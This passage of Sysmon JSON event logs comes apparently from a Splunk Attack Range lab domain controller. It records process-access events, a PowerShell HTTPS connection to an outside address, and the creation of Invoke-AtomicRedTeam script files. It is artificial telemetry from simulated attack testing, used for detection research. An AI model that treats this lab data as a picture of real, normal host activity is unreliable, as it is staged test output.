C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5094,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5095,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5096,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.944\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-001055160700}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.944","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-001055160700}","TargetProcessId":"4700","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5097,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:02.522\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:02.522","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5098,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.413\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nSourceProcessId: 2928\r\nSourceThreadId: 3388\r\nSourceImage: C:\\Windows\\sysmon64.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\sysmon64.exe+2515c|C:\\Windows\\sysmon64.exe+1b75d|C:\\Windows\\sysmon64.exe+1bb9f|C:\\Windows\\sysmon64.exe+1bcb5|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.413","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","SourceProcessId":"2928","SourceThreadId":"3388","SourceImage":"C:\\Windows\\sysmon64.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","TargetProcessId":"4500","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\sysmon64.exe+2515c|C:\\Windows\\sysmon64.exe+1b75d|C:\\Windows\\sysmon64.exe+1bb9f|C:\\Windows\\sysmon64.exe+1bcb5|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5099,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.413\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nSourceProcessId: 2928\r\nSourceThreadId: 3388\r\nSourceImage: C:\\Windows\\sysmon64.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ntdll.dll+6c08a|C:\\Windows\\System32\\KERNEL32.DLL+1cff8|C:\\Windows\\System32\\KERNEL32.DLL+25a87|C:\\Windows\\sysmon64.exe+15618|C:\\Windows\\sysmon64.exe+16062|C:\\Windows\\sysmon64.exe+16487|C:\\Windows\\sysmon64.exe+1991e|C:\\Windows\\sysmon64.exe+1b8c4|C:\\Windows\\sysmon64.exe+1bb9f|C:\\Windows\\sysmon64.exe+1bcb5|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.413","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","SourceProcessId":"2928","SourceThreadId":"3388","SourceImage":"C:\\Windows\\sysmon64.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","TargetProcessId":"4500","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ntdll.dll+6c08a|C:\\Windows\\System32\\KERNEL32.DLL+1cff8|C:\\Windows\\System32\\KERNEL32.DLL+25a87|C:\\Windows\\sysmon64.exe+15618|C:\\Windows\\sysmon64.exe+16062|C:\\Windows\\sysmon64.exe+16487|C:\\Windows\\sysmon64.exe+1991e|C:\\Windows\\sysmon64.exe+1b8c4|C:\\Windows\\sysmon64.exe+1bb9f|C:\\Windows\\sysmon64.exe+1bcb5|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":5100,"ProcessID":2928,"ThreadID":3388,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.330\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-8400769.attackrange.local\r\nSourcePort: 52650\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 199.232.64.133\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.330","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-8400769.attackrange.local","SourcePort":"52650","DestinationIsIpv6":"false","DestinationIp":"199.232.64.133","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5101,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.460\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\AtomicClassSchema.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.460","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.460","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\AtomicClassSchema.ps1","CreationUtcTime":"2020-08-01 06:55:03.460","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5102,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.460\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Get-PrereqExecutor.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.460","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.460","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Get-PrereqExecutor.ps1","CreationUtcTime":"2020-08-01 06:55:03.460","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5103,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.460\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Get-TargetInfo.ps1\r\nCreationUtcTime: 2020-08-01 06:55:03.460","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.460","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Get-TargetInfo.ps1","CreationUtcTime":"2020-08-01 06:55:03.460","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
